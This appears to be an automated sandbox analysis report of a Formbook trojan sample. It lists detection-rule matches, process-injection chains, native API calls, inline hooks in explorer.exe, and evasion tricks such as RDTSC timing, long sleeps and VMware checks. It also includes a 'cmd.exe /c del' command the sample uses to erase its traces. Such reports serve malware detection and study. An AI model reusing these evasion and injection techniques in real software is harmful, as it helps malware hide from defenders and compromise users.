Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001C.00000002.770516120.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: CSA73881.exe PID: 5724, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: InstallUtil.exe PID: 5408, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 3004, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0325C1A0	0_2_0325C1A0
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064534C8	0_2_064534C8
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06453058	0_2_06453058
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064510B0	0_2_064510B0
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06456AA0	0_2_06456AA0
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06458870	0_2_06458870
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06453018	0_2_06453018
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06459087	0_2_06459087
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064510A0	0_2_064510A0
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06456A90	0_2_06456A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E4120	14_2_012E4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012CF900	14_2_012CF900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139E824	14_2_0139E824
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EA830	14_2_012EA830
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01381002	14_2_01381002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F20A0	14_2_012F20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013920A8	14_2_013920A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DB090	14_2_012DB090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013928EC	14_2_013928EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01392B28	14_2_01392B28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012EAB40	14_2_012EAB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012FEBB0	14_2_012FEBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013803DA	14_2_013803DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138DBD2	14_2_0138DBD2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0137FA2B	14_2_0137FA2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013922AE	14_2_013922AE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012C0D20	14_2_012C0D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01392D07	14_2_01392D07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01391D55	14_2_01391D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012F2581	14_2_012F2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012DD5E0	14_2_012DD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013925DD	14_2_013925DD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012D841F	14_2_012D841F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138D466	14_2_0138D466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01391FF1	14_2_01391FF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0139DFCE	14_2_0139DFCE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_012E6E30	14_2_012E6E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0138D616	14_2_0138D616
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01392EF7	14_2_01392EF7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: String function: 012CB150 appears 54 times

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_01309910
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013099A0 NtCreateSection,LdrInitializeThunk,	14_2_013099A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_01309860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309840 NtDelayExecution,LdrInitializeThunk,	14_2_01309840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013098F0 NtReadVirtualMemory,LdrInitializeThunk,	14_2_013098F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309A20 NtResumeThread,LdrInitializeThunk,	14_2_01309A20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309A00 NtProtectVirtualMemory,LdrInitializeThunk,	14_2_01309A00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309A50 NtCreateFile,LdrInitializeThunk,	14_2_01309A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309540 NtReadFile,LdrInitializeThunk,	14_2_01309540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013095D0 NtClose,LdrInitializeThunk,	14_2_013095D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309710 NtQueryInformationToken,LdrInitializeThunk,	14_2_01309710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013097A0 NtUnmapViewOfSection,LdrInitializeThunk,	14_2_013097A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309780 NtMapViewOfSection,LdrInitializeThunk,	14_2_01309780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309660 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_01309660
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013096E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_013096E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309950 NtQueueApcThread,	14_2_01309950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013099D0 NtCreateProcessEx,	14_2_013099D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309820 NtEnumerateKey,	14_2_01309820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130B040 NtSuspendThread,	14_2_0130B040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013098A0 NtWriteVirtualMemory,	14_2_013098A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309B00 NtSetValueKey,	14_2_01309B00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130A3B0 NtGetContextThread,	14_2_0130A3B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309A10 NtQuerySection,	14_2_01309A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309A80 NtOpenDirectoryObject,	14_2_01309A80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130AD30 NtSetContextThread,	14_2_0130AD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309520 NtWaitForSingleObject,	14_2_01309520
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309560 NtWriteFile,	14_2_01309560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013095F0 NtQueryInformationFile,	14_2_013095F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309730 NtQueryVirtualMemory,	14_2_01309730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130A710 NtOpenProcessToken,	14_2_0130A710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0130A770 NtOpenThread,	14_2_0130A770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309770 NtSetInformationFile,	14_2_01309770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309760 NtOpenProcess,	14_2_01309760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309FE0 NtCreateMutant,	14_2_01309FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309610 NtEnumerateValueKey,	14_2_01309610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309670 NtQueryInformationProcess,	14_2_01309670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_01309650 NtQueryValueKey,	14_2_01309650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_013096D0 NtCreateKey,	14_2_013096D0

Source: CSA73881.exe, 00000000.00000000.240713040.0000000000DE2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamemobitech66754.exe. vs CSA73881.exe
Source: CSA73881.exe, 00000000.00000002.311026406.0000000001388000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs CSA73881.exe
Source: CSA73881.exe, 00000000.00000002.319250218.00000000043F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFbniqdbbwru.dll" vs CSA73881.exe
Source: CSA73881.exe, 00000000.00000002.327687009.000000000EE70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFbniqdbbwru.dll" vs CSA73881.exe
Source: CSA73881.exe, 00000000.00000002.314157578.00000000032C5000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs CSA73881.exe

Source: CSA73881.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CSA73881.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\CSA73881.exe "C:\Users\user\Desktop\CSA73881.exe"
Source: C:\Users\user\Desktop\CSA73881.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CSA73881.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process created: C:\Windows\SysWOW64\control.exe C:\Windows\SysWOW64\control.exe	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\CSA73881.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CSA73881.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/1@5/3

Source: CSA73881.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\CSA73881.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll			Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3236:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: CSA73881.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: CSA73881.exe

Static file information: File size 2187264 > 1048576

Source: CSA73881.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CSA73881.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x215200

Source: CSA73881.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: InstallUtil.exe, InstallUtil.exe, 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000E.00000003.313743282.0000000001108000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.470353191.0000000004975000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.774017184.0000000004DCF000.00000040.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000003.474545794.0000000004B15000.00000004.00000800.00020000.00000000.sdmp, control.exe, 0000001C.00000002.771221161.0000000004CB0000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp
Source:	Binary string: InstallUtil.pdb source: control.exe, 0000001C.00000002.767573609.00000000009FA000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001C.00000002.776199164.00000000051DF000.00000004.10000000.00040000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: CSA73881.exe, tds.cs

.Net Code: cov System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0325F888 push E8944D8Bh; ret	0_2_0325F88D
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064534C8 push es; iretd	0_2_06456600
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064534C8 push es; ret	0_2_0645663C
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064534C8 push es; retf 453Bh	0_2_0645666C
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06456601 push es; ret	0_2_0645663C
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0645658D push es; retf	0_2_064565A4
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0645658D push es; iretd	0_2_06456600
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_064565A5 push es; iretd	0_2_06456600
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0645CCE6 push es; retf	0_2_0645CD04
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0645CD4D push es; retf	0_2_0645CD2C
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_0645CD16 push ss; retf	0_2_0645CD19
Source: C:\Users\user\Desktop\CSA73881.exe	Code function: 0_2_06452A75 push es; iretd	0_2_06452A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 14_2_0131D0D1 push ecx; ret	14_2_0131D0E4

Hooking and other Techniques for Hiding and Protection

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xED

Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\CSA73881.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect virtualization through RDTSC time measurements

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030A9904 second address: 00000000030A990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\control.exe	RDTSC instruction interceptor: First address: 00000000030A9B7E second address: 00000000030A9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\CSA73881.exe TID: 5728	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5708	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5708	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe TID: 5548	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\control.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 14_2_01395BA5 rdtsc

14_2_01395BA5

Source: C:\Users\user\Desktop\CSA73881.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

API coverage: 4.7 %

Source: C:\Users\user\Desktop\CSA73881.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\CSA73881.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 00000010.00000000.406845206.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000010.00000000.406845206.00000000080ED000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Prod_VMware_SATA
Source: explorer.exe, 00000010.00000000.377793288.0000000004287000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: 00000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA
